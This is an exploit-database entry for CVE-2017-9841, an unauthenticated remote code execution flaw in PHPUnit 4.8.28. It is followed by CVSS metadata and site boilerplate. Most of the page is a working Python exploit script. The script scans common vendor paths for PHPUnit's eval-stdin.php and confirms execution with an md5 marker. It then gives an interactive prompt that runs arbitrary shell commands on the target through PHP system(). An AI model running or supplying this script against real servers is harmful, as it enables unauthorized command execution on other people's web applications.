PHP Unit 4.8.28 Remote Code Execution

2022.02.04
Credit: souzo
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated) # Date: 2022/01/30 # Exploit Author: souzo # Vendor Homepage: phpunit.de # Version: 4.8.28 # Tested on: Unit # CVE : CVE-2017-9841 import requests from sys import argv phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] def check_vuln(site): vuln = False try: for i in phpfiles: site = site+i req = requests.get(site,headers= { "Content-Type" : "text/html", "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0", },data="<?php echo md5(phpunit_rce); ?>") if "6dd70f16549456495373a337e6708865" in req.text: print(f"Vulnerable: {site}") return site except: return vuln def help(): exit(f"{argv[0]} <site>") def main(): if len(argv) < 2: help() if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]: help() site = argv[1] if site.endswith("/"): site = list(site) site[len(site) -1 ] = '' site = ''.join(site) pathvuln = check_vuln(site) if pathvuln == False: exit("Not vuln") try: while True: cmd = input("> ") req = requests.get(str(pathvuln),headers={ "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0", "Content-Type" : "text/html" },data=f'<?php system(\'{cmd}\') ?>') print(req.text) except Exception as ex: exit("Error: " + str(ex)) main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top